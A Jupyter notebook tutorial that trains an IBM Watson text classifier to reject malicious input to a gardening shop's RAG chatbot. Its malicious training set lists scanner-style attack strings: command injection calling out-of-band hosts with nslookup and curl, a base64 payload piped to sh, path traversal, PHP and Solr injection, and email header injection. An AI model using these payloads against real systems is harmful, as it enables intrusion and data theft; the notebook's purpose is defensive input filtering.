# Content Design for RAG
This notebook is part of a collection of material related to content design principles for retrieval-augmented generation (RAG).

You can explore the complete collection here: [Content Design for RAG on GitHub](https://github.com/spackows/ICAAI-2024_RAG-CD/blob/main/README.md)

**Example scenario**

Imagine your company sells seeds and gardening supplies online.  On your website, you have articles with gardening information and advice.  You are building a RAG solution for your company website that can answer customer questions about your products, using your website articles as a knowledge base.

# Filter input
When users submit input to your RAG solution, you need to make sure malicious input, such as Javascript-injection attempts, are immediately rejected and not passed along to your solution to do harm.

This sample notebook demonstrates a simple approach this problem.  A traditional text classifier is a good tool for this job.

**Contents**
1. Training data
2. Create text classifier
3. Test input

## 1. Training data

In [1]:
valid_arr = [
{ "labels" : [ "valid" ], "text" : "What is a cucumber?" },
{ "labels" : [ "valid" ], "text" : "What are the varieties of tomato?" },
{ "labels" : [ "valid" ], "text" : "What is the biggest gourd" },
{ "labels" : [ "valid" ], "text" : "how tall do sunflwers get?" },
{ "labels" : [ "valid" ], "text" : "What is the best dirt" },
{ "labels" : [ "valid" ], "text" : "The reason for black spots" },
{ "labels" : [ "valid" ], "text" : "Best type of fertizlier" },
{ "labels" : [ "valid" ], "text" : "can you plant indoors?" },
{ "labels" : [ "valid" ], "text" : "I got only one cucumber then it died" },
{ "labels" : [ "valid" ], "text" : "What is a trellis for?" },
{ "labels" : [ "valid" ], "text" : "How do you protect plants from late frost in spring?" },
{ "labels" : [ "valid" ], "text" : "Do peppers like full sun" },
{ "labels" : [ "valid" ], "text" : "Can I grow only one bluberry plant, or do I need multiple ones" },
{ "labels" : [ "valid" ], "text" : "what is the cause for blight?" },
{ "labels" : [ "valid" ], "text" : "What is the easiest plant to grow" },
{ "labels" : [ "valid" ], "text" : "how big of a pot do I need to grow hot peppers?" },
{ "labels" : [ "valid" ], "text" : "Can you harvest raspberries the first year" },
{ "labels" : [ "valid" ], "text" : "How to stop slugs from eating holes in peppers" },
{ "labels" : [ "valid" ], "text" : "whatis vermiculite" },
{ "labels" : [ "valid" ], "text" : "How to store strawberries so theystay fresh?" },
{ "labels" : [ "valid" ], "text" : "Can you can without boiling the jars first?" },
{ "labels" : [ "valid" ], "text" : "how long can cucumbers keep after you pick them" },
{ "labels" : [ "valid" ], "text" : "My peppers neevr got ripe" },
{ "labels" : [ "valid" ], "text" : "If I want to start tomatoes indoors, how much light do they need and when should I start them?" },
{ "labels" : [ "valid" ], "text" : "Is a cucumber a fruit or a vegitable?" },
{ "labels" : [ "valid" ], "text" : "Do you sell grow lights?" },
{ "labels" : [ "valid" ], "text" : "How can I stop my spinach from going to seeds" },
{ "labels" : [ "valid" ], "text" : "Ca I grow bananas where I live" },
{ "labels" : [ "valid" ], "text" : "how to harvest potatoes without cutting them up" },
{ "labels" : [ "valid" ], "text" : "Can you grow peanuts in a planter" },
{ "labels" : [ "valid" ], "text" : "will copper stop snails" },
{ "labels" : [ "valid" ], "text" : "the birds keep eating the fruit" },
{ "labels" : [ "valid" ], "text" : "what fencing keeps out bears?" },
{ "labels" : [ "valid" ], "text" : "How hot is too hot for what fruits?" }
]

In [2]:
malicious_arr = [
{ "labels" : [ "malicious" ], "text" : "!((&!|*|*|" },
{ "labels" : [ "malicious" ], "text" : "\${@print(md5(31347))}" },
{ "labels" : [ "malicious" ], "text" : "&echo amjfzp()\ weltsxd^xyz||a #' &echo amjfzp" },
{ "labels" : [ "malicious" ], "text" : "&nslookup hitndmwedlswo45776\.bxss\.me&'`0&nslookup hitndmwedlswo45776\.bxss\.me&`'" },
{ "labels" : [ "malicious" ], "text" : ")))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))" },
{ "labels" : [ "malicious" ], "text" : "*:*&fl=*,id:[value%20v='\u0036\u0036\u003690295675\u0039\u0039'],name:[value%20v='\u0036\u0036\u003690295675\u0039\u0039'],content:[value%20v='\u0036\u0036\u003690295675\u0039\u0039\u0039'],body:[value%20v='\u0036\u0036\u003690295675\u0039\u0039\u0039'],title:[value%20v='\u0036\u0036\u003690295675\u0039\u0039']&rows=1#" },
{ "labels" : [ "malicious" ], "text" : "../e" },
{ "labels" : [ "malicious" ], "text" : "'.print(md5(31347)).'" },
{ "labels" : [ "malicious" ], "text" : "/etc/shells" },
{ "labels" : [ "malicious" ], "text" : "/xfs\.bxss\.me" },
{ "labels" : [ "malicious" ], "text" : "@@17Llb" },
{ "labels" : [ "malicious" ], "text" : "[email protected]" },
{ "labels" : [ "malicious" ], "text" : "^(!#@#" },
{ "labels" : [ "malicious" ], "text" : "{'$acunetix': '1'}" },
{ "labels" : [ "malicious" ], "text" : "|nslookup cff65eh5d97qmkj1gousqozq1q5jeg\.oast\.online|curl cff65eh5d97qmkj1gousqozq1q5jeg\.oast\.online" },
{ "labels" : [ "malicious" ], "text" : "<h1>test<" },
{ "labels" : [ "malicious" ], "text" : "1;nslookup{IFS}cff65eh5d97qmkj1rnen5ue1o9iwk4\.oast\.online;\#" },
{ "labels" : [ "malicious" ], "text" : "aaa&shards=http://hitajtaveq480a\.bxss\.me/solr" },
{ "labels" : [ "malicious" ], "text" : "bxss\.me/t/xss\.html?%00" },
{ "labels" : [ "malicious" ], "text" : "cookie_injection" },
{ "labels" : [ "malicious" ], "text" : "Dn6v8NGW" },
{ "labels" : [ "malicious" ], "text" : "ebcc:009217.1488-5603146.1458.a12e8.19016.2@bxss.me" },
{ "labels" : [ "malicious" ], "text" : "echo mqjqou()\ nxuyfrz^xyu||a #' &echo mqjqou" },
{ "labels" : [ "malicious" ], "text" : "FUZZ/../../../../../../../../../../../../../../var/www/html/index.html" },
{ "labels" : [ "malicious" ], "text" : "FUZZ/.travis.sh" },
{ "labels" : [ "malicious" ], "text" : "FUZZ/phpMyAdmin 2/server_import.php" },
{ "labels" : [ "malicious" ], "text" : "Http://bxss\.me/t/fit.txt" },
{ "labels" : [ "malicious" ], "text" : "http://dicrpdbjmmfyopp.zzz/yrphmgdpgulaszriylefmacafkxycjaxjs?.jpg" },
{ "labels" : [ "malicious" ], "text" : "pBt49H3V" },
{ "labels" : [ "malicious" ], "text" : "PC90Mj2NyaXB0PmFsZXJ0KY3VtZW50LmRvbWFpbik8L3NjcmlwdD48aDI" },
{ "labels" : [ "malicious" ], "text" : "to@example.com>bcc:009247.16187-244247.16707.22w18.19098.2@bxss.me" },
{ "labels" : [ "malicious" ], "text" : "x -oProxyCommand=echo bnNsb29rdXJTdCJTdCaW50ZXJRzaC1mwlN0QlN0Q=|base64 -d|sh}" }
]

In [3]:
training_arr = valid_arr + malicious_arr

In [6]:
import json
with open( "training_data.json", "w", encoding="utf-8" ) as file:
    json.dump( training_arr, file, ensure_ascii=False, indent=3 )

!ls

training_data.json


## 2. Create text classifier
This sample uses the [Natural Language Understanding service on IBM Cloud](https://cloud.ibm.com/catalog/services/natural-language-understanding)

See: 
- [Create classification model](https://cloud.ibm.com/apidocs/natural-language-understanding?code=python#createclassificationsmodel)
- [JSON format training data](https://cloud.ibm.com/docs/natural-language-understanding?topic=natural-language-understanding-classifications#training-data-in-json-format)

In [7]:
# Paste the credentials for your NLU service instance here
nlu_apikey = ""
nlu_url = ""

In [None]:
!pip install ibm_watson | tail -n 1

In [9]:
from ibm_watson import NaturalLanguageUnderstandingV1
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator

auth = IAMAuthenticator( nlu_apikey )
nlu = NaturalLanguageUnderstandingV1( version="2022-04-07", authenticator=auth )
nlu.set_service_url( nlu_url )

In [None]:
parms = { "model_type" : "single_label" }
model_id = ""
with open( "training_data.json", "rb" ) as file:
    model = nlu.create_classifications_model( language="en", training_data=file, training_parameters=parms ).get_result()
    model_id = model["model_id"]
    print( json.dumps( model, indent=2 ) )
    print( "\nmodel_id: " + model_id )

In [14]:
from time import sleep

model_info = nlu.get_classifications_model( model_id=model_id ).get_result()

counter = 0
while( ( counter < 40 ) and ( model_info["status"] != "available" ) ):
    counter += 1
    sleep( 8 )
    model_info = nlu.get_classifications_model( model_id=model_id ).get_result()
    print( "( " + str( counter ) + " ) status: " + model_info["status"] )

if( model_info["status"] == "available" ):
    print( "\nClassifier ready\n" )
else:
    print( "\nClassifier not ready.  Run this cell again to continue monitoring training." )


Classifier ready



## 3. Test input

See: [Analyze text](https://cloud.ibm.com/apidocs/natural-language-understanding?code=python#analyze)

In [22]:
from ibm_watson.natural_language_understanding_v1 import Features, ClassificationsOptions

def classify( input_txt ):
    result = nlu.analyze( text=input_txt, features=Features( classifications=ClassificationsOptions( model=model_id ) ) ).get_result()
    #print(json.dumps( result, indent=2 ) )
    class_0 = result["classifications"][0]["class_name"]
    score_0 = result["classifications"][0]["confidence"]
    class_1 = result["classifications"][1]["class_name"]
    score_1 = result["classifications"][1]["confidence"]
    print( class_0 + ": " + str( score_0 ) )
    print( class_1 + ": " + str( score_1 ) )
    return class_0 if ( score_0 > score_1 ) else class_1

In [24]:
txt = "How can I grow cucumbers faster?"
class_name = classify( txt )
print( "\nClass: " + class_name )

valid: 0.999997
malicious: 3e-06

Class: valid


In [25]:
txt = "Set-Cookie:crlfinjection=crlfinjection"
class_name = classify( txt )
print( "\nClass: " + class_name )

malicious: 0.999374
valid: 0.000626

Class: malicious
